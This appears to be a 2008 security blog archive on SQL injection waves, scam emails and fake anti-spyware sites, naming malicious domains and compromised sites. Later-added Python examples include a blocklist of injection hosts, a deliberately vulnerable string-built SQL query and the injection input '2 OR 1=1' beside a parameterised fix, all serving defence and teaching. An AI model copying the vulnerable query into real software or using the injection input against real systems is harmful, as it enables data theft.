
Monday, 9 June 2008

SQL Injection: sslnet72.com, encode72.com, bannerupd.com, err68.com, cookieadw.com

Another batch of domains showing up in SQL injection attacks are sslnet72.com, encode72.com, bannerupd.com, err68.com, cookieadw.com.

Some notable compromised sites:

  • ise.ie - Irish Stock Exchange
  • pittsfield-ma.org - City of Pittsfield
  • corangamite.vic.gov.au - Corangamite Shire, Victoria
  • fdc.org.br - Brazilian government agency
  • dailyu.com - Local newspaper
  • www.humanrightsfirst.org - Campaigning organisation
  • therecruitbusiness.com - Recruiting
  • corporate-responsibility.org - Business information
  • childcarefinancialaid.org - Financial information
  • micronet.com - Computer storage
  • tairawhiti.ac.nz - Tairawhiti Polytechnic, New Zealand
The payload at the moment is undetermined, and some of these sites will have been cleaned up. At the time of writing, the Irish Stock Exchange at ise.ie is still compromised.

"Company Littmann Stethoscopes Co.Ltd" bogus job, spoofing medisave.net

medisave.net is an "under construction" website belonging to the wholly legitimate Medisave UK Ltd, a supplier of medical equipment.

Unfortunately, there is a fake job offer being sent out in Medisave's name. One twist is that the "From:" address is jobs@medisave.net, but the "Reply-To:" address is littmannstethoscopeshelpdesk@gmail.com. The spammers are taking advantage of the fact that the "Reply-To:" address is often not visible until the user clicks "Reply"; until then they tend to see only the fake "From:" address (note that medisave.net is not compromised and is not sending out these emails).

The job offer is likely to be some sort of money mule/money laundering scam. Really there's no need to dig further. Of interest is the fact that the email address has been harvested from a UK retailer and this is a UK-targeted spam.

From: Company Littmann Stethoscopes Co.Ltd
Reply-To: littmannstethoscopeshelpdesk@gmail.com
Subject: Online Job Opportunity (Apply Now )

Would you like to earn £5,000 in a week?

Reply Back for more details

100% legal No upfront payment from you.

Risk Free

Amazon.com - reverse pump and dump or blackmail?

I received this unintelligible email from an IP address in Russia (213.221.29.19), probably relating to the recent mystery outage at Amazon.com.

Subject: Amazon.com In what a problem?
Date: Mon, June 9, 2008 7:14 am

Hello!
News agency Reuters informs about not to working capacity of a site amazon.com in
current of two weeks since June, 9th and corresponding it to falling of share price. Be close
at work with them.

What gives? My best guess is that someone is trying either to drive the share price down (perhaps they have a put option), or that it is part of some blackmail plot relating to the amazon.com outage.

Unfortunately for the bad guys, the email is completely incomprehensible. As spam, this one is definitely destined for the failboat.

Thursday, 5 June 2008

Googling for SQL injection infected sites

A very rough and ready Google search shows (warning: results may lead to malware) 792,000 pages that were infected when Google visited the site. Sites that say "This site may harm your computer." can be considered as persistent offenders. Note also that the search results may have some false positives.

All very interesting, you might think. But if you work in an IT department, it can be very useful to find sites that your users might visit so that you can take action.. or perhaps you can even check your own business.

In this current round of attacks, the bad javascript file is called b.js, so you can find a lot of infected sites by Googling for "script src" b.js (you need to include the quotes). That gives hundreds of thousands of matches.

One obvious check is to add your company name, for example "script src" b.js "oceanic airlines", but Google is cleverer than that. If you use the "inurl" function, then you can search for sites in certain TLDs or with certain names. For example "script src" b.js inurl:gov lists several government sites, "script src" b.js inurl:oceanic would find results on sites such as oceanic-air.com, oceanicair.net, oceanic-air.co.uk.

You can narrow down results by country by using the Advanced Search (or you could just use the "national" Google site such as google.co.uk, google.ca etc). You can use other search engines too, but really Google has the most powerful searching options.

Of course, if you want to confirm if the site is still infected, then you will need to visit it. If you don't want all the hassle of firing up a Linux box, then one safe tool is SamSpade for Windows which allows you to look at the underlying HTML safely. It's a pretty old tool, and not perfect, but very useful for a number of tasks. Alternatively, WGET for Windows is more powerful and it allows you to download files in a command line (although care needs to be taken once they are on your machine). I tend to use both.
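The Google checks above find pages that were infected when they were crawled; to confirm the current state of a page you have to look at its HTML, as the post says. The following is an added example, not code from the original post: a small Python scanner that takes HTML saved with wget (or any fetcher that does not execute scripts) and reports external script tags whose host is one of the injection domains named in these posts, or whose filename is one the injections used (b.js and friends). The host and filename lists are compiled from this page and are illustrative rather than a current blocklist, and the sample HTML is constructed.

```python
"""Check saved HTML for injected <script src=...> tags (added example).

Fetch the page with a tool that does not run scripts, e.g.
    wget -O page.html http://www.example.com/
then call scan_file("page.html"). Domain and filename lists are taken from
the posts on this page and are illustrative, not a complete blocklist.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Injection domains named in the posts above (illustrative, not exhaustive).
INJECTION_HOSTS = {
    "view89.com", "tag58.com", "win496.com", "rundll841.com", "en-us18.com",
    "libid53.com", "rundll92.com", "sysid72.com", "locale48.com", "exec51.com",
    "sslnet72.com", "encode72.com", "bannerupd.com", "err68.com",
    "cookieadw.com", "nihaorr1.com", "chliyi.com", "xiaobaishan.net",
    "winzipices.cn",
}
# Script filenames these injections used. A filename match on an unknown
# external host is only "suspect": the name alone is not proof.
INJECTION_FILES = {"b.js", "1.js", "2.js", "3.js", "4.js", "5.js",
                   "reg.js", "f.js", "ip.js"}


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag, wherever it sits.

    The injected tags often land in the middle of page text, because the
    attack appends them to database columns, so <head> is not assumed."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        for name, value in attrs:
            if name.lower() == "src" and value:
                self.sources.append(value.strip())


def external_scripts(html):
    """Every script src in document order, relative ones included."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    return collector.sources


def registrable(host):
    """Crude registrable domain: last two labels (enough for the TLDs here)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def flag_injected(html, hosts=INJECTION_HOSTS, files=INJECTION_FILES):
    """Return (src, reason) pairs for external scripts that look injected."""
    flagged = []
    for src in external_scripts(html):
        parsed = urlparse(src)
        if not parsed.netloc:
            continue  # same-site relative script: not what these attacks add
        if registrable(parsed.netloc) in hosts:
            flagged.append((src, "known injection host"))
        elif parsed.path.rsplit("/", 1)[-1] in files:
            flagged.append((src, "suspect filename on external host"))
    return flagged


def scan_file(path):
    """Scan a page that was saved to disk."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return flag_injected(fh.read())


# Constructed sample: one injection inside page text (unquoted src, as the
# real injections were), one at the end of <body>, plus two legitimate scripts.
SAMPLE_HTML = """<html><head>
<script src="/static/site.js"></script>
<script src="http://cdn.example.net/jquery.js"></script>
</head><body>
<h1>Flight status<script src=http://www.view89.com/b.js></script></h1>
<p>Welcome</p>
<script src="http://www.tag58.com/b.js"></script>
</body></html>"""

if __name__ == "__main__":
    for src, reason in flag_injected(SAMPLE_HTML):
        print(f"{reason}: {src}")
```

Running it on the constructed sample reports the two b.js references and ignores the local and CDN scripts; point scan_file at a page you saved with wget to check your own site.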

More SQL injection fun: view89.com, exe94.com and tag58.com

Yet more new domains in this never ending wave of SQL Injection attacks: view89.com, exe94.com and tag58.com. Infected sites load a malicious javascript from www.view89.com/b.js or www.tag58.com/b.js which redirects through exe94.com/cgi-bin/index.cgi?ad - that in turn might try any number of things to infect the visitor's PC.

Chinese "selling-domain" mails

Probably not a scam, and really only a moderate hit on the Spam-O-Meter, but there do seem to be a number of emails from a person called Liu offering to sell a .cn version of your .com domain.

Subject: selling-domain: ------.cn
From: ljp013@vip.163.com
Date: Thu, June 5, 2008 1:13 am


Hello
We have ------.cn and think it is useful for you to made a China Website and
to explore China market.

We are pleased to inform you that we are now engage an activity by which you
can purchase this domain only with $1000 USD. If you are interested in it
,please reply to us and discuss the domain tranfer matters.
We could finish the transaction through www.sedo.com which is a international
Domain trade agency.Then,sedo.com will help you transferred the domain.
China is the biggest market in the world！Dot.cn domains is a symbol of
enterprises in China！10,000,000 .cn domains are been registered！

At last,Sorry for the disturb if any.

Wish you a happy new year 2008, and welcome to our China to visit Olympic Games.

Best Regards.

Liu


=================

Appendix:
Some large international companies use .cn domain in China.
http://www.google.cn/ The world's largest search company google.com China Station
http://www.Amazon.cn The world's largest online bookstore amazon.com company
China Station
http://www.Yahoo.cn Yahoo.com he is the sub-stations in China

It used to be the case that anyone wanting to register a .CN name had to either live in China or have a business that operated in China, although this is no longer the case and it seems everyone can register a .CN name (some restrictions apply on names and content). Neulevel's FAQs on the .CN TLD are enlightening. There is a dispute policy if you feel that your domain name has been registered unfairly.

To be honest, I'm not at all bothered about .CN names and I certainly won't be shelling out $1000 for something I won't use. But as ever, if you want to protect your brand abroad then perhaps securing the .cn version of your domain might be a good idea, there's a list of registrars at CNNIC.

flyzhu.9966.org and exec51.com SQL injection attacks

More in the ever morphing world of SQL injection attacks. Sites that were hit with the xiaobaishan.net attack are now directing to flyzhu.9966.org/us/Help.asp and sites previously infected with en-us18.com are now pointing to www.exec51.com/b.js

9966.org appears to be a dynamic DNS service, and exec51.com is hosted on a fast flux botnet. My best guess is that there are two rival groups performing SQL injections, one of them Chinese and the other Russian.

The nature of the botnet means that the payload delivery is a bit erratic, but with a bit of effort exec51.com coughs up a reference to fake anti-spyware site advancedxpdefender.com. That tries to install a trojan which is pretty well detected by most AV products.

Thanks also to Amir who pointed us in the direction of his guide to preventing SQL injection attacks - if your server has been hit by one of these exploits, then it might be useful to you.

Wednesday, 4 June 2008

Redmondmag.com and related sites serving up malware

One notable name that keeps coming up with regards to the latest round of SQL injection attacks is Redmondmag.com, published by 1105 Media, Inc, as well as a number of its sister sites. For a publication aimed at IT professionals to be so badly impacted by SQL injection attacks raises some eyebrows.

A quick bit of Google searching shows how bad it is: a search for sysid72.com "1105 media" shows 35 infected pages belonging to virtualizationreview.com, visualstudiomagazine.com, redmondmag.com, reddevnews.com and certcities.com. Searching for xiaobaishan.net "1105 media" comes up with 121 matches for tcpmag.com and certcities.com. There are similar hits when searching for en-us18.com and locale48.com.

An alternative search you can do is b.js "1105 media" where this current batch of injected javascripts can clearly be seen (of course, this blog entry will also turn up for the same search string in time!)

This problem goes back to at least April when redmondmag.com was infected by the nihaorr1.com attack.

Here's the thing: the sites showing up in Google are not infected at the moment, but they were when Google crawled them. Clearly 1105 Media cleans up the attacks quickly, but it has not yet managed to secure its SQL server against injection attacks. Perhaps 1105 Media should read some of their own articles on the subject (see redmondmag.com/news/article.asp?editorialsid=9928 - visit at your own risk!)

win496.com, tag58.com, rundll841.com and sslput4.com: another SQL injection attack

Yet another SQL injection attack doing the rounds, this time inserting references to www.win496.com/b.js, www.tag58.com/b.js and www.rundll841.com/b.js. The javascript redirects to sslput4.com/cgi-bin/index.cgi?ad. (Obviously, don't visit these sites unless you know what you are doing!)

All the domains run on a distributed botnet and were freshly registered this morning to a no-doubt fake address:

whois -h whois.crsnic.net win496.com ...
Redirecting to DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM

whois -h whois.PublicDomainRegistry.com win496.com ...
Registration Service Provided By: VIVIDS MEDIA GMBH
Contact: +49.3094413291

Domain Name: WIN496.COM

Registrant:
n/a
lera (casta4000@mail.ru)
reklama uslug 727 94-00
Seul
3566,123456
RU
Tel. +7.4952345672

Creation Date: 04-Jun-2008
Expiration Date: 04-Jun-2009

Domain servers in listed order:
ns4.win496.com
ns3.win496.com
ns2.win496.com
ns1.win496.com


Administrative Contact:
n/a
lera (casta4000@mail.ru)
reklama uslug 727 94-00
Seul
3566,123456
RU
Tel. +7.4952345672

Technical Contact:
n/a
lera (casta4000@mail.ru)
reklama uslug 727 94-00
Seul
3566,123456
RU
Tel. +7.4952345672

Billing Contact:
n/a
lera (casta4000@mail.ru)
reklama uslug 727 94-00
Seul
3566,123456
RU
Tel. +7.4952345672

Status:ACTIVE

There are probably several different payloads; one we have seen is the Danmec trojan, which drops a file called aspimgr.exe into the SYSTEM32 folder (more details here, here and here). The payload delivery may be randomised; it seems to be quite difficult to determine exactly what is going on.

If your server has been infected, then you need to do more than just clean it up.. you need to sanitize your SQL inputs. You can read more details of how SQL injection works here.
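To show what "sanitize your SQL inputs" means in code, here is an added example that is not from the post. It uses Python's sqlite3 rather than the ASP and SQL Server stack these attacks actually hit, and the articles table is constructed. The vulnerable lookup pastes a request parameter into the query text, so a value such as 2 OR 1=1 rewrites the WHERE clause and returns a row the site never meant to publish; the hardened version validates the type and binds the value as a parameter, so it can never become SQL. The attacks described on this page exploit the same concatenation flaw to write script tags into database content; the root cause is identical.

```python
"""String-built SQL beside the parameterised fix (added example, not from the post)."""
import sqlite3


def setup_db():
    """In-memory table with one row the public site must never show (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, public INTEGER)"
    )
    conn.executemany("INSERT INTO articles VALUES (?, ?, ?)", [
        (1, "Welcome", 1),
        (2, "Press release", 1),
        (3, "Draft: unpublished", 0),
    ])
    return conn


def get_article_vulnerable(conn, article_id):
    """Pastes the request parameter into the SQL text: the bug behind these attacks."""
    sql = "SELECT title FROM articles WHERE public = 1 AND id = " + article_id
    return [row[0] for row in conn.execute(sql)]


def get_article_safe(conn, article_id):
    """Validate the type, then bind the value so it is data, never SQL."""
    try:
        ident = int(article_id)
    except (TypeError, ValueError):
        raise ValueError("article id must be an integer")
    rows = conn.execute(
        "SELECT title FROM articles WHERE public = 1 AND id = ?", (ident,)
    )
    return [row[0] for row in rows]


def demo(bad_input="2 OR 1=1"):
    """Run both versions on a normal id and on input that carries extra SQL."""
    conn = setup_db()
    try:
        get_article_safe(conn, bad_input)
        rejected = False
    except ValueError:
        rejected = True
    return {
        # Both return the one public row for a well-formed id.
        "vulnerable_normal": get_article_vulnerable(conn, "2"),
        # "... AND id = 2 OR 1=1": the OR swallows the public = 1 filter,
        # so the unpublished draft leaks.
        "vulnerable_bad": get_article_vulnerable(conn, bad_input),
        "safe_normal": get_article_safe(conn, "2"),
        # The hardened version refuses the value before it reaches the database.
        "safe_rejects_bad": rejected,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The same discipline applies whatever the database: every value that comes from a request is passed as a bound parameter, and anything that must be an integer is converted to one before the query is built.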

Right now it is difficult to say how many sites are impacted as the domains are really very new.
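The whois records quoted in these posts carry the tells the author is reading by eye: a creation date of today, the same contact on every role, nameservers under the domain itself. This added example (not from the post) extracts those facts from whois text so the check can be repeated on any domain. It understands the two layouts shown on this page ("Key: value" as above, and the dotted "Key....... value" layout of the chliyi.com record further down); the 30-day freshness threshold is an assumption, and the two embedded records are trimmed copies of the ones quoted on this page.

```python
"""Triage facts from whois output (added example, not the blog's own code)."""
import re
from datetime import date, datetime

# "Key: value" and "Key....... value" both reduce to this shape.
KEYVAL = re.compile(r"^\s*([A-Za-z][A-Za-z ]*?)\s*[.:]+\s*(.*?)\s*$")
EMAIL = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
DATE_FORMATS = ("%d-%b-%Y", "%Y-%m-%d %H:%M:%S", "%Y-%m-%d")
FRESH_DAYS = 30  # assumption: registered within the last month counts as "fresh"


def parse_date(text):
    """Parse the date formats seen in these records; None if unrecognised."""
    for fmt in DATE_FORMATS:
        try:
            return datetime.strptime(text, fmt).date()
        except ValueError:
            continue
    return None


def parse_whois(text):
    """Return (first value per key, nameservers, contact e-mails)."""
    fields, nameservers, emails = {}, [], set()
    in_ns_block = False
    for raw in text.splitlines():
        line = raw.strip()
        emails.update(EMAIL.findall(line))
        if in_ns_block:  # bare hostnames after "Domain servers in listed order:"
            if line and " " not in line and ":" not in line:
                nameservers.append(line.lower())
                continue
            in_ns_block = False
        m = KEYVAL.match(line)
        if not m:
            continue
        key, value = m.group(1).strip().lower(), m.group(2)
        if key == "domain servers in listed order":
            in_ns_block = True
        elif key == "name server" and value:
            nameservers.append(value.lower())
        elif value:
            fields.setdefault(key, value)
    return fields, nameservers, emails


def triage(whois_text, as_of):
    """Facts a defender checks first: age, expiry, contacts, self-hosted DNS."""
    if isinstance(as_of, str):
        as_of = date.fromisoformat(as_of)
    fields, nameservers, emails = parse_whois(whois_text)
    domain = fields.get("domain name", "").lower()
    created = parse_date(fields.get("creation date", ""))
    expires = parse_date(fields.get("expiration date") or fields.get("expiry date", ""))
    age = (as_of - created).days if created else None
    return {
        "domain": domain,
        "age_days": age,
        "freshly_registered": age is not None and age <= FRESH_DAYS,
        "days_to_expiry": (expires - as_of).days if expires else None,
        "contact_emails": sorted(emails),
        # Nameservers inside the domain itself: the registrant runs its own
        # DNS, consistent with the botnet hosting described in the post.
        "self_hosted_dns": bool(nameservers)
        and all(ns.endswith("." + domain) for ns in nameservers),
    }


# Trimmed copies of the two records quoted on this page.
WIN496_WHOIS = """Registration Service Provided By: VIVIDS MEDIA GMBH

Domain Name: WIN496.COM

Registrant:
n/a
lera (casta4000@mail.ru)
RU
Tel. +7.4952345672

Creation Date: 04-Jun-2008
Expiration Date: 04-Jun-2009

Domain servers in listed order:
ns4.win496.com
ns3.win496.com
ns2.win496.com
ns1.win496.com

Administrative Contact:
lera (casta4000@mail.ru)

Status:ACTIVE
"""

CHLIYI_WHOIS = """Domain Name.......... chliyi.com
Creation Date........ 2003-06-12 11:21:39
Expiry Date.......... 2008-06-12 11:21:39
Organisation Name.... junrong shen
Organisation Address. suzhou
Organisation Address. CN
Admin Email.......... wzh@hisuzhou.com
Tech Email........... wzh@hisuzhou.com
Name Server.......... dns22.hichina.com
Name Server.......... dns21.hichina.com
"""

if __name__ == "__main__":
    print(triage(WIN496_WHOIS, "2008-06-04"))  # registered today, own DNS
    print(triage(CHLIYI_WHOIS, "2008-05-27"))  # five years old, expires in 16 days
```

The two records come out the way the posts read them: win496.com is zero days old with its own nameservers and one e-mail address on every role, while chliyi.com is nearly five years old, uses a registrar's nameservers and has 16 days left to run, which fits a legitimate domain that was compromised rather than registered for the attack.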

Added: you can add sysid72.com/b.js to this list too. That was registered 5 days ago, and a Google search already shows over 2000 hits. Also locale48.com has infected over 4000 pages in the same time frame.

Tuesday, 3 June 2008

Some people are stupid

A classic post over at the F-Secure blog where some muppet "hacker" accidentally emailed out their malware generation tool and put it right into the hands of anti-virus researchers. To quote F-Secure: "Hey, thanks. Keep up the good work."

On a more serious note, this tool is used to generate trojanised PDF files. So go and check that your version of Adobe Reader is up to date right now before doing anything else..

en-us18.com, libid53.com and rundll92.com SQL injection attack

Another bunch of at least three domains (perhaps more) being used in SQL injection attacks are en-us18.com, libid53.com and rundll92.com. In each case the injected script points to b.js, and this then tries to redirect visitors to libid53.com/cgi-bin/index.cgi?ad

It looks like some sort of fast flux network based on a botnet, so it's not actually very reliable and as yet it hasn't delivered a payload in our lab. The ISC indicates that the attack serves up a couple of infected Flash banners, although in this case the redirector seems to be en-us18.com/cgi-bin/index.cgi?ad

At the moment, these merely serve up another redirect to MSN.com, but it would be easy enough for the botnet controllers to change that to a malicious payload.

Some notable infected sites:

  • tcpmag.com (Technology magazine - again!)
  • annefrank.org (Anne Frank Museum)
  • galatta.com (Indian movies)
  • onefootball.dk (Sport)
  • tvoneonline.com (US TV station)
  • belfastcity.gov.uk (UK local government)
  • marketingprinciples.com (Marketing guide)
  • hobsonsbay.vic.gov.au (Australia local government)
This is quite a fresh-looking exploit, so this list is not comprehensive. It is very disappointing to see tcpmag.com listed yet again, and we've seen sister publication redmondmag.com infected before too.

xiaobaishan.net - yet another SQL injection attack

It looks like the sites hit by the chliyi.com attack have been hit again, this time with an injection to a script pointing at www.xiaobaishan.net/dt/us/Help.asp. Right at the moment, the www.xiaobaishan.net domain is not resolving, but it does appear to be hosted on 219.146.128.119 in China.

It looks like the domain may well be a legitimate one that has somehow been compromised and 219.146.128.119 looks like a pretty standard shared server.

It's possible that the chliyi.com infected sites were deliberately targeted; the resulting HTML is an awful mess though (see below).

Some notable infected sites:

  • kcsg.com (again)
  • sciencescotland.org (again)
  • paramountcomedy.com (again)
  • drdrew.com (again)
  • gisp.org (again)
  • legis.state.ia.us (Iowa State legislature)
  • modernamuseet.se (Stockholm Museum)
  • calbears.berkeley.edu (University)
  • reportchildsex.com (Child protection)
  • cas.org.uk (Citizen's Advice Scotland)
  • tcpmag.com (Technology magazine)
  • randomhouse.com.au (Random House publishers, Australia)
  • ispyni.com (Northern Ireland tourism)
A number of other sites, notably in Ireland, Australia and Canada, have been hit too.

This is not the only SQL injection attack doing the rounds today, and I suspect that some of them have been hit by another one pointing at en-us18.com/b.js

As an aside, these multiple SQL injections are really messy. A code snippet from sciencescotland.org demonstrates this:

Monday, 2 June 2008

Bizarre USPS scam


It's hard to tell what the scammer is trying here due to the amusingly bad English. The mail originates from the spammers' favourite email service, Gmail (72.14.214.225), but uses a French Yahoo! email address as a drop box with a Polish "From" address.

Clearly some sort of parcel scam where there will be a release fee of some description. Steer clear.

Subject: Please Contact Us With This Email Address Below (usps6864@yahoo.fr)
From: "markwillams2 Gazeta.pl"


Hello Dear,


Please i have to let you knowing this that your have reciverd your parcel,
and do not let me knowing about that since last year.



At this very point now, do to i have not heard from you to knowing the
sitution of things now, for your information track your parcel and you will
sean what am talking about please.

However if you knowing that you are not the one please do get back to me as
matter of urgent to day.please track and sean with this information Below

http://www.usps.com/shipping/trackandconfirmfaqs.htm

Label Number: 0515 0134 7110 8886 8806

Please Contact Us With This Email Address Below (usps6864@yahoo.fr)

Thanks
Mark Williams

Tuesday, 27 May 2008

pest-patrol.com is not the real PestPatrol - part II

The fake pest-patrol.com site we mentioned a few days ago has fixed its download problem and has given us a sample. Like many of these fake anti-malware sites, the executable morphs continually to evade detection.

Detection rates are not good (VirusTotal results), and the real PestPatrol / eTrust product doesn't pick it up yet.

I strongly suspect that there's nothing good in the 85.255.112.0 - 85.255.127.255 range at all, and it is probably a good idea to block access to that entire IP block.

Antivirus;Version;Last Update;Result
AhnLab-V3;2008.5.22.1;2008.05.27;-
AntiVir;7.8.0.19;2008.05.27;SPR/Dldr.PestPatr.A
Authentium;5.1.0.4;2008.05.26;-
Avast;4.8.1195.0;2008.05.27;-
AVG;7.5.0.516;2008.05.26;-
BitDefender;7.2;2008.05.27;-
CAT-QuickHeal;9.50;2008.05.26;-
ClamAV;0.92.1;2008.05.27;-
DrWeb;4.44.0.09170;2008.05.27;-
eSafe;7.0.15.0;2008.05.26;-
eTrust-Vet;31.4.5826;2008.05.27;-
Ewido;4.0;2008.05.26;-
F-Prot;4.4.4.56;2008.05.26;-
F-Secure;6.70.13260.0;2008.05.27;-
Fortinet;3.14.0.0;2008.05.27;-
GData;2.0.7306.1023;2008.05.27;-
Ikarus;T3.1.1.26.0;2008.05.27;-
Kaspersky;7.0.0.125;2008.05.27;not-a-virus:Downloader.Win32.FraudLoad.bz
McAfee;5303;2008.05.26;-
Microsoft;1.3520;2008.05.27;-
NOD32v2;3134;2008.05.27;-
Norman;5.80.02;2008.05.26;-
Panda;9.0.0.4;2008.05.27;-
Prevx1;V2;2008.05.27;-
Rising;20.46.12.00;2008.05.27;-
Sophos;4.29.0;2008.05.27;-
Sunbelt;3.0.1123.1;2008.05.17;-
Symantec;10;2008.05.27;-
TheHacker;6.2.92.320;2008.05.26;-
VBA32;3.12.6.6;2008.05.27;-
VirusBuster;4.3.26:9;2008.05.26;-
Webwasher-Gateway;6.6.2;2008.05.27;Riskware.Dldr.PestPatr.A

chliyi.com - another injection attack

Thanks to Dancho Danchev for the heads up, it looks like there's another SQL injection attack on the loose, this time pointing to chliyi.com/reg.js, with about 10,000 hits currently on Google for a variety of sites.

Reportedly, this launches some sort of ActiveX attack via obfuscated VBScript. This is another good reason not to use Internet Explorer, as most other browsers do not support ActiveX and are not vulnerable.

Unlike some other recent injection attacks, this one seems to use a legitimate domain called chliyi.com - unfortunately for the bad guys, the registration on the domain is going to run out pretty soon.

Domain Name.......... chliyi.com
Creation Date........ 2003-06-12 11:21:39
Registration Date.... 2003-06-12 11:21:39
Expiry Date.......... 2008-06-12 11:21:39
Organisation Name.... junrong shen
Organisation Address. dongxiaoqiao3-1-104
Organisation Address.
Organisation Address. suzhou
Organisation Address. 215006
Organisation Address. JS
Organisation Address. CN

Admin Name........... shen junrong
Admin Address........ dongxiaoqiao3-1-104
Admin Address........
Admin Address........ suzhou
Admin Address........ 215006
Admin Address........ JS
Admin Address........ CN
Admin Email.......... wzh@hisuzhou.com
Admin Phone.......... +86.51265678898
Admin Fax............ +86.51257306265

Tech Name............ zhihui wang
Tech Address......... suzhou
Tech Address.........
Tech Address......... suzhou
Tech Address......... 215021
Tech Address......... JS
Tech Address......... CN
Tech Email........... wzh@hisuzhou.com
Tech Phone........... +86.5169697639
Tech Fax............. +86.5167621807

Bill Name............ zhihui wang
Bill Address......... suzhou
Bill Address.........
Bill Address......... suzhou
Bill Address......... 215021
Bill Address......... JS
Bill Address......... CN
Bill Email........... wzh@hisuzhou.com
Bill Phone........... +86.5169697639
Bill Fax............. +86.5167621807
Name Server.......... dns22.hichina.com
Name Server.......... dns21.hichina.com

The IP address of the server is 218.30.96.87, which is not in the Spamhaus DROP list; this indicates again that chliyi.com might well be legitimate, just compromised.

This is another attack that goes to show that "there is no such thing as a safe site". A scan of the Google results comes up with some interesting (and alarming) infected sites:

  • forces.ca - Canadian military
  • paramountcomedy.com - Paramount Comedy (Cable TV channel)
  • kcsg.com - KCSG (Utah TV station)
  • umnh.utah.edu - University of Utah
  • digital.lib.ecu.edu - East Carolina University
  • chapel.duke.edu - Duke University
  • drdrew.com - Dr Drew (relationship advice)
  • gisp.org - Global Invasive Species Program
  • sciencescotland.org - Royal Society of Scotland
  • moffitt.org - H. Lee Moffitt Cancer Center and Research Institute
  • confetti.co.uk - Confetti (Wedding planning)
  • buildabear.com - Build-a-Bear Workshop
  • delluniversity.com - Dell
  • trelleborg.com - Trelleborg AB (Polymer manufacturer)
None of these are huge sites when it comes to traffic, but there are some well-known names there, and certainly some which you would hope would be more secure. Among the other infected sites, the US, Canada, Australia, the UK and Ireland have the biggest clusters, with very few showing outside those countries.

This is not a comprehensive list of infected sites, and many of these sites will have been cleaned up.

If you are running an SQL server, then the rule is to secure your inputs, else you will get attacked again and again.

Wednesday, 21 May 2008

pest-patrol.com is not the real PestPatrol

Thanks to Dancho Danchev for pointing out pest-patrol.com, yet another dodgy looking scareware site. Of course, the real PestPatrol is a pretty well known and legitimate anti-spyware product from CA; the one with the hyphen in the middle is definitely trying to pass itself off as the real thing.



The fake pest-patrol.com is hosted on 85.255.121.181 in the Ukraine, a range of network addresses that features on the Spamhaus DROP list, and has domain registration service from Estdomains which always seems to be a popular choice with dodgy web sites.

The bottom of the page has a copyright notice claiming that it was created by "Pest Patrol, Inc.", but that is likely to be fake. A large amount of text has been copied and pasted directly from the real CA site. The "PestPatrol" name is pretty widely registered as a trademark, so apart from anything else, this fake pest-patrol.com site is clearly violating CA's trademark rights.

What's interesting about this is just how the pest-patrol.com domain ended up in the hands of a bunch of guys in Eastern Europe. Although the "PestPatrol" name is trademarked, that only applies to computer software. As it turns out, the original pest-patrol.com controlled pests of the creepy-crawly variety. CA (or SaferSite Inc as it was before CA took over) would have had no claim over the domain name as it wasn't violating any trademark or causing confusion. But eventually the name expired and after being dropped a couple of times it ended up with someone who clearly is using it to violate a trademark.

The lesson for businesses is perhaps that they need to keep an eye on domains that could potentially violate a trademark or be confusing, and secure them if they expire; several registrars can back order domain names. In the long run, that's probably easier than trying to track down an anonymous registrant from the former Soviet Union.

The download option on pest-patrol.com doesn't work at present, but it could be similar to this one (VirusTotal scan results) which appears on a sister site. Unfortunately, CA's genuine product doesn't seem to detect it..

Sunday, 11 May 2008

Mass phpBB attack free.hostpinoy.info and xprmn4u.info

Another injection attack reported by the ISC, and this time it appears to be using one of many potential flaws in phpBB. Injected code points to free.hostpinoy.info/f.js and xprmn4u.info/f.js, and a Google search of these two terms currently comes up with 858,000 matches between them indicating that this is a very large scale attack.

phpBB is a great bit of software, but sadly it is riddled with security holes and requires constant updating. If you're running a phpBB forum then you need to patch it as a matter of urgency. If you don't run phpBB and are looking at running a forum then I've got to say.. try something else.

It looks like some version of the Zlob trojan is being served up, see here and here for more details. (Thanks sowhatx). Detection rates seem to be patchy. It's possible that the injected code is using some sort of geotargeting as the destination sites are not consistent.

free.hostpinoy.info is 209.51.196.254 (XLHost.com)
xprmn4u.info is 217.199.217.9 (Mastak.ru)

Updated: A brief analysis of some of the impacted sites shows a mix of high traffic forums and long-dead ones. Some of these forums are hit with multiple exploits and massive amounts of spam, which indicates that they are running a very out of date version of phpBB.. so folks, if you have a forum which you don't use any more, do everyone a favour and delete it.

Wednesday, 7 May 2008

winzipices.cn and bbs.jueduizuan.com - another SQL injection attack

The ISC has warned about another SQL Injection attack, following on from this one a few weeks ago. This time the injection is inserting a script pointing to the winzipices.cn and bbs.jueduizuan.com domains.

The malicious script is pointing to winzipices.cn/1.js, winzipices.cn/2.js, winzipices.cn/3.js, winzipices.cn/4.js and winzipices.cn/5.js and also bbs.jueduizuan.com/ip.js. As ever, don't visit these sites unless you know what you are doing.

Right at the moment, winzipices.cn is coming up with a server error, but bbs.jueduizuan.com is functioning just fine. This tries to attack visiting systems using the MS07-004 vulnerability, a RealPlayer vulnerability plus it attempts to download an executable from www.bluell.cn/ri.exe possibly using a shell vulnerability (VirusTotal analysis here, mostly detected as Trojan.Win32.Agent.lpv, Trojan.MulDrop.origin or TR/Dropper.Gen).

Some IP addresses:
www.bluell.cn is 60.191.239.219
winzipices.cn is 60.191.239.229
bbs.jueduizuan.com is 60.191.239.219

My recommendation is to block access to the entire 60.191.239.x range if you can.

At the moment, a Google search for winzipices.cn shows 1790 matches, for jueduizuan.com it is 1640 matches. Expect those figures to climb sharply.

If you are running an impacted SQL server, then you need to secure it and perform better validation, else the problem will happen again. Client machines should be protected if they are fully up-to-date on patches, if you have been infected then use the excellent Secunia Software Inspector to check your system for vulnerable apps.

As always, there are some high profile sites that have been compromised. They may well have been cleaned up by now, so inclusion here does not mean that they are unsafe or safe to visit.

bbs.jueduizuan.com
  • safecanada.ca (Canadian Homeland Security again).
  • breastcanceradvice.com, arthritisissues.com, menssexhealth.com, www.bipolardepressioninfo.com (Health)
  • dubaicityguide.com (Travel)
